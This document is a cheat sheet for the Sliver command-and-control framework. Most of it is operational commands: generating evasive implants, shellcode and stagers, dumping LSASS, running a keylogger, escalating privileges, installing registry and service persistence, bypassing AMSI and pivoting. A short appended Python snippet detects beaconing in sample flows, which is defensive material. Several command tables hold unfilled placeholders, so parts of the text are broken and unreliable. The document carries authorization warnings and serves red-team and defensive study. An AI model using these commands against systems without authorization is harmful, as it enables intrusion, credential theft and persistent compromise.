
Sliver C2 Framework Cheat Sheet


Overview

Sliver is a modern, open-source, cross-platform adversary emulation and red team framework designed as an alternative to Cobalt Strike. It provides advanced command-and-control capabilities with support for multiple platforms, evasive communications and team-based operations.

Warning: This tool is intended only for authorized penetration testing and red team exercises. Make sure you have proper authorization before using it in any environment.

Installation

```bash
# Download latest release for Linux
curl -L https://github.com/BishopFox/sliver/releases/latest/download/sliver-server_linux -o sliver-server
chmod +x sliver-server

# Download latest release for macOS
curl -L https://github.com/BishopFox/sliver/releases/latest/download/sliver-server_macos -o sliver-server
chmod +x sliver-server

# Download latest release for Windows
# Download sliver-server_windows.exe from GitHub releases
```

Build from Source

```bash
# Install Go (version 1.19+)
git clone https://github.com/BishopFox/sliver.git
cd sliver
make
```

Docker Installation

```bash
# Pull official Docker image
docker pull bishopfox/sliver

# Run Sliver server in Docker
docker run -it -p 31337:31337 -p 8080:8080 bishopfox/sliver
```

Basic Usage

Starting the Sliver Server

```bash
# Start the server (first run will generate certificates)
./sliver-server

# Start server with custom configuration
./sliver-server -c /path/to/config.json

# Start server in daemon mode
./sliver-server daemon
```

Client Connection

```bash
# Connect to local server
./sliver-client

# Connect to remote server
./sliver-client -c /path/to/client.cfg

# Generate new client configuration
./sliver-server operator --name username --lhost server-ip
```

Command Reference

Server Management

| Command | Description |
|---------|-------------|
| INLINE_CODE_30 | Display help information |
| INLINE_CODE_31 | Show version information |
| INLINE_CODE_32 | List connected operators |
| INLINE_CODE_33 | Disconnect an operator |
| INLINE_CODE_34 | Access the Sliver armory (extensions) |

Listener Management

Implant Generation

| Command | Description |
|---------|-------------|
| INLINE_CODE_42 | Generate implant |
| INLINE_CODE_43 | Generate mTLS implant |
| INLINE_CODE_44 | Generate HTTP implant |
| INLINE_CODE_45 | Generate DNS implant |
| INLINE_CODE_46 | List implant profiles |
| INLINE_CODE_47 | Create new profile |

Session Management

| Command | Description |
|---------|-------------|
| INLINE_CODE_48 | List active sessions |
| INLINE_CODE_49 | Interact with session |
| INLINE_CODE_50 | Background current session |
| INLINE_CODE_51 | Kill a session |
| INLINE_CODE_52 | Kill all sessions |

Listener Setup

mTLS Listener (Recommended)

```bash
# Start mTLS listener on default port (8888)
mtls

# Start mTLS listener on custom port
mtls -l 443

# Start mTLS listener with custom interface
mtls -l 0.0.0.0:8888
```

HTTP/HTTPS Listener

```bash
# Start HTTP listener
http -l 80

# Start HTTPS listener with custom certificate
https -l 443 -c /path/to/cert.pem -k /path/to/key.pem

# Start HTTP listener with custom domain
http -l 80 -d example.com
```

DNS Listener

```bash
# Start DNS listener
dns -d example.com

# Start DNS listener with custom nameserver
dns -d example.com -l 53
```

WireGuard Listener

```bash
# Start WireGuard listener
wg -l 53

# Start WireGuard listener with custom key port
wg -l 53 -x 1234
```

Implant Generation

Basic Implant Generation

```bash
# Generate Windows executable
generate --mtls 192.168.1.100:8888 --os windows --arch amd64 --format exe

# Generate Linux ELF binary
generate --mtls 192.168.1.100:8888 --os linux --arch amd64 --format elf

# Generate macOS binary
generate --mtls 192.168.1.100:8888 --os darwin --arch amd64 --format macho
```

Advanced Implant Options

```bash
# Generate with custom name and save location
generate --mtls 192.168.1.100:8888 --os windows --save /tmp/implant.exe --name MyImplant

# Generate with evasion features
generate --mtls 192.168.1.100:8888 --os windows --evasion --skip-symbols

# Generate shellcode
generate --mtls 192.168.1.100:8888 --os windows --format shellcode

# Generate shared library
generate --mtls 192.168.1.100:8888 --os linux --format shared
```

Staged Payloads

```bash
# Generate staged payload
generate --mtls 192.168.1.100:8888 --os windows --format exe --strategy staged

# Generate stager
generate stager --mtls 192.168.1.100:8888 --os windows --arch amd64 --format exe
```

Session Interaction

Basic Session Commands

```bash
# Get system information
info

# Get current user
whoami

# Get current working directory
pwd

# List files and directories
ls

# Change directory
cd /path/to/directory

# Download file
download /remote/path/file.txt

# Upload file
upload /local/path/file.txt /remote/path/
```

Process Management

```bash
# List processes
ps

# Get current process info
getpid

# Migrate to another process
migrate

# Execute command
execute

# Start interactive shell
shell

# Terminate process
terminate
```

Network Operations

```bash
# Get network interfaces
ifconfig

# Get network connections
netstat

# Port forward
portfwd add --bind 127.0.0.1:8080 --remote 192.168.1.10:80

# List port forwards
portfwd

# Remove port forward
portfwd rm --id

# SOCKS proxy
socks5 start

# Stop SOCKS proxy
socks5 stop
```

Privilege Escalation

```bash
# Get current privileges
getprivs

# Attempt privilege escalation
getsystem

# Run as different user
runas -u username -p password

# Impersonate token
impersonate

# Revert to self
rev2self
```

Persistence

```bash
# Install service persistence
persistence service --name ServiceName --path /path/to/implant.exe

# Install registry persistence
persistence registry --hive HKCU --path "Software\Microsoft\Windows\CurrentVersion\Run" --key "MyApp"

# Remove persistence
persistence remove --id
```

Advanced Features

Pivoting and Lateral Movement

```bash
# Generate pivot listener
pivots tcp --bind 0.0.0.0:9999

# Connect through pivot
generate --mtls pivot-host:9999 --os windows

# List active pivots
pivots

# Stop pivot
pivots --id stop
```

Credential Harvesting

```bash
# Dump process memory
procdump -p -s /tmp/dump.dmp

# Dump LSASS
procdump -n lsass.exe -s /tmp/lsass.dmp

# Screenshot
screenshot

# Keylogger
keylogger start
keylogger dump
keylogger stop
```

Evasion Techniques

```bash
# Process hollowing
execute-assembly --process notepad.exe /path/to/assembly.exe

# In-memory .NET assembly execution
execute-assembly /path/to/assembly.exe

# PowerShell execution
powershell -c "Get-Process"

# Bypass AMSI
armory install bypass-amsi
```

Profiles and Templates

Creating Profiles

```bash
# Create new implant profile
profiles new windows-profile --mtls 192.168.1.100:8888 --os windows --arch amd64

# Generate from profile
generate --profile windows-profile

# List profiles
profiles

# Delete profile
profiles rm windows-profile
```

C2 Profile Customization

```bash
# HTTP C2 profile with custom headers
http --lhost 0.0.0.0 --lport 80 --website /path/to/website

# HTTPS with custom certificate
https --cert /path/to/cert.pem --key /path/to/key.pem --lhost 0.0.0.0 --lport 443
```

Armory Extensions

Installing Extensions

```bash
# Update armory
armory update

# Install extension
armory install

# List available extensions
armory

# List installed extensions
armory installed
```

Popular Extensions

```bash
# Process injection techniques
armory install process-injection

# Credential dumping
armory install credman

# Registry operations
armory install registry

# WMI operations
armory install wmi
```

Team Operations

Multi-Operator Setup

```bash
# Generate operator config
./sliver-server operator --name operator1 --lhost server-ip --save operator1.cfg

# Connect as operator
./sliver-client -c operator1.cfg

# List connected operators
operators

# Send message to operators
msg "Hello team!"
```

Session Sharing

```bash
# Share session with team
sessions -i --shared

# Take control of shared session
use
```

Troubleshooting

Common Issues

Connection Problems

```bash
# Check listener status
jobs

# Restart listener
jobs -k
mtls -l 8888

# Check firewall rules
# Ensure ports are open on server
```

Implant Detection

```bash
# Use evasion options
generate --mtls 192.168.1.100:8888 --os windows --evasion --skip-symbols --debug

# Try different communication protocols
generate --dns example.com --os windows

# Use staged payloads
generate stager --mtls 192.168.1.100:8888 --os windows
```

Performance

```bash
# Adjust beacon interval
use
reconfig --beacon-interval 60s

# Use compression
reconfig --compress
```

Debugging

```bash
# Enable debug mode
./sliver-server --debug

# Check logs
tail -f ~/.sliver/logs/sliver.log

# Verbose client output
./sliver-client --debug
```

Security Considerations

Operational Security

  • Use encrypted communications (mTLS recommended)
  • Rotate certificates and keys regularly
  • Implement proper access controls for operators
  • Monitor and log all activities
  • Use staging servers to avoid direct attribution

Evasion Best Practices

  • Vary beacon intervals and jitter
  • Use legitimate-looking domains and certificates
  • Implement domain fronting where possible
  • Use multiple communication channels
  • Update implants and techniques regularly
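
From the defender's side, beacon interval and jitter are the properties that network monitoring measures when hunting for C2 call-outs. The following is an added example, not part of the original cheat sheet or the Sliver project: it scores constructed flow records for regular call-out timing, and the record layout, thresholds and function names are assumptions.

```python
from collections import defaultdict
from statistics import median

# Constructed sample flow records: (epoch_seconds, src_ip, dst_ip, dst_port).
# 10.0.0.5 calls out roughly every 60 s with small jitter; 10.0.0.9 is bursty browsing.
_JITTER = [0, 4, -3, 6, -5, 2, -1, 5, -4, 3, 1, -2]
SAMPLE_FLOWS = (
    [(1000 + 60 * i + j, "10.0.0.5", "203.0.113.10", 8888) for i, j in enumerate(_JITTER)]
    + [(t, "10.0.0.9", "198.51.100.7", 443)
       for t in (1000, 1002, 1003, 1150, 1151, 1600, 1604, 1605, 1990, 2400, 2401, 2403)]
)

def interval_stats(times):
    """Return (median interval, relative dispersion) for a list of timestamps."""
    times = sorted(times)
    deltas = [b - a for a, b in zip(times, times[1:])]
    med = median(deltas)
    if med <= 0:
        return med, float("inf")
    # Median absolute deviation is robust to a few delayed or missed check-ins.
    mad = median(abs(d - med) for d in deltas)
    return med, mad / med

def find_beacons(flows, min_events=8, min_interval_s=5, max_dispersion=0.25):
    """Flag (src, dst, port) tuples whose call-outs stay regular despite jitter."""
    by_flow = defaultdict(list)
    for ts, src, dst, port in flows:
        by_flow[(src, dst, port)].append(ts)
    hits = []
    for key, times in by_flow.items():
        if len(times) < min_events:
            continue  # too few connections to judge periodicity
        med, disp = interval_stats(times)
        if med < min_interval_s:
            continue  # sub-interval bursts are page loads, not check-ins
        if disp <= max_dispersion:
            hits.append({"flow": key, "interval_s": med, "dispersion": round(disp, 3)})
    return hits

if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_FLOWS):
        print(hit)
```

In production the same scoring would run over proxy, firewall or NetFlow logs, with thresholds tuned against known-good periodic traffic such as update checks and monitoring agents.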

Resources

---

*This cheat sheet provides a comprehensive reference for using the Sliver C2 framework. Always make sure you have proper authorization before using this tool in any environment.*